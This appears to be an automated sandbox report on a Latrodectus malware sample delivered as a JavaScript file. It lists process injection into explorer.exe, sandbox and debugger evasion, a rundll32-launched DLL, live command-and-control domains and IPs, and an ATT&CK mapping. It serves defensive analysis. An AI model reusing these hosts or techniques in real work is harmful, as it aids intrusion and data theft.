                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep count: 4125 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep time: -247500000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep count: 5725 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 3396Thread sleep time: -343500000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep count: 8824 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep time: -8824000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 3924Thread sleep count: 429 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3924Thread sleep time: -42900s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep count: 243 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6148Thread sleep time: -243000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FEAF79 FindFirstFileExW,4_2_00FEAF79
                  Source: C:\Windows\explorer.exeCode function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_0305A8E0
                  Source: C:\Windows\explorer.exeCode function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_03052B28
                  Source: C:\Windows\explorer.exeCode function: 8_2_030604C0 FindFirstFileW,8_2_030604C0
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: rundll32.exe, 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: explorer.exe, 00000008.00000003.3094346841.000000000C8C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                  Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000008.00000002.3335475832.0000000007693000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-49576
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CADCCE0 LdrGetProcedureAddress,6_2_000001FF4CADCCE0
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FBD0A5 IsDebuggerPresent,OutputDebugStringW,4_2_00FBD0A5
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FE2DCC mov ecx, dword ptr fs:[00000030h]4_2_00FE2DCC
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FEAD78 mov eax, dword ptr fs:[00000030h]4_2_00FEAD78
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB2310 GetProcessHeap,4_2_00FB2310
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00FD33A8
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD353F SetUnhandledExceptionFilter,4_2_00FD353F
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00FD2968
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00FD6E1B
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800402A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018005C2BC

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\rundll32.exe | Network Connect: 82.115.223.39 8041
                  Source: C:\Windows\explorer.exe | Network Connect: 188.114.96.3 443
                  Source: C:\Windows\System32\rundll32.exe | Network Connect: 80.78.24.30 8041
                  Source: C:\Windows\System32\rundll32.exe | Memory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and write
                  Source: C:\Windows\System32\rundll32.exe | Code function: 6_3_00007DF459570100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF459570100
                  Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,6_2_0000000273F41380
                  Source: C:\Windows\System32\rundll32.exe | Thread created: C:\Windows\explorer.exe EIP: 3050000
                  Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 3050000 value starts with: 4D5A
                  Source: C:\Windows\System32\rundll32.exe | Memory written: PID: 1028 base: 3050000 value: 4D
                  Source: C:\Windows\System32\rundll32.exe | Thread register set: 5880 1
                  Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 3050000
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: 4_2_00FB52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_00FB52F0
                  Source: C:\Windows\Installer\MSIF29D.tmp | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: explorer.exe, 00000008.00000000.2449712553.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                  Source: explorer.exe, 00000008.00000002.3332339160.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2447498972.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                  Source: explorer.exe, 00000008.00000002.3331052313.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2446927908.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: 4_2_00FD35A9 cpuid 4_2_00FD35A9
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: EnumSystemLocalesW,4_2_00FEE0C6
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: EnumSystemLocalesW,4_2_00FEE1AC
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: EnumSystemLocalesW,4_2_00FE7132
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: EnumSystemLocalesW,4_2_00FEE111
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00FEE237
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetLocaleInfoEx,4_2_00FD23F8
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetLocaleInfoW,4_2_00FEE48A
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00FEE5B3
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetLocaleInfoW,4_2_00FEE6B9
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetLocaleInfoW,4_2_00FE76AF
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00FEE788
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00FEDE24
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0000000180053038
                  Source: C:\Windows\System32\rundll32.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_0000000180052534
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_0000000180052904
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_00000001800529D4
                  Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,6_2_0000000180048A24
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_0000000180047A78
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_0000000180047BBC
                  Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_0000000180047C44
                  Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0000000180052E38
                  Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: 4_2_00FD37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00FD37D5
                  Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001FF4CAF4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001FF4CAF4D00
                  Source: C:\Windows\Installer\MSIF29D.tmp | Code function: 4_2_00FE7B1F GetTimeZoneInformation,4_2_00FE7B1F
                  Source: C:\Windows\explorer.exe | Code function: 8_2_0305891C RtlGetVersion,GetVersionExW,8_2_0305891C
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
                  Source: Yara match | File source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
                  Source: Yara match | File source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 2 Scripting | 1 Replication Through Removable Media | 1 Native API | 2 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 812 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 35 System Information Discovery | SSH | Keylogging | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Masquerading | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Virtualization/Sandbox Evasion | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 812 Process Injection | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

Behavior Graph
ID: 1525184 | Sample: Document-18-33-08.js | Startdate: 03/10/2024 | Architecture: WINDOWS | Score: 100

Domains/IPs: tiguanin.com; isomicrotich.com; 2 other IPs or domains
Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Yara detected Latrodectus; 9 other signatures

wscript.exe (started)
    Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
msiexec.exe (started)
    DNS/IP: 188.119.112.7, 49704, 80 SERVERIUS-ASNL Russian Federation
    Dropped: C:\Windows\Installer\MSIF29D.tmp, PE32
    Dropped: C:\Users\user\AppData\...\vierm_soft_x64.dll, PE32+
    Dropped: C:\Windows\Installer\MSIF1DF.tmp, PE32
    Dropped: 3 other files (none is malicious)
    Signature: Drops executables to the windows directory (C:\Windows) and starts them
    msiexec.exe (started)
    MSIF29D.tmp (started)
        rundll32.exe (started)
            rundll32.exe (started)
                DNS/IP: greshunka.com 82.115.223.39, 49708, 49875, 49938 MIDNET-ASTK-TelecomRU Russian Federation
                DNS/IP: bazarunet.com 80.78.24.30, 49705, 49706, 49707 CYBERDYNELR Cyprus
                Signature: System process connects to network (likely due to code injection or exploit)
                Signature: Contains functionality to inject threads in other processes
                Signature: Injects code into the Windows Explorer (explorer.exe)
                Signature: 5 other signatures
                explorer.exe (injected)
                    DNS/IP: isomicrotich.com 188.114.96.3, 443, 50048, 50050 CLOUDFLARENETUS European Union
                    Signature: System process connects to network (likely due to code injection or exploit)

Source | Detection | Scanner | Label | Link
Document-18-33-08.js | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\vierm_soft_x64.dll | 8% | ReversingLabs | |
C:\Windows\Installer\MSIF101.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIF160.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIF1BF.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIF1DF.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIF29D.tmp | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://powerpoint.office.comcember | 0% | URL Reputation | safe |
https://excel.office.com | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe |
https://outlook.com | 0% | URL Reputation | safe |
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
https://api.msn.com/ | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
isomicrotich.com | 188.114.96.3 | true | true | | unknown
greshunka.com | 82.115.223.39 | true | true | | unknown
tiguanin.com | 80.78.24.30 | true | true | | unknown
bazarunet.com | 80.78.24.30 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://opewolumeras.com/test/ | true | | unknown
https://isomicrotich.com/test/ | true | | unknown
00000006.00000003.2536131672.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2444803935.000001FF4CA4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
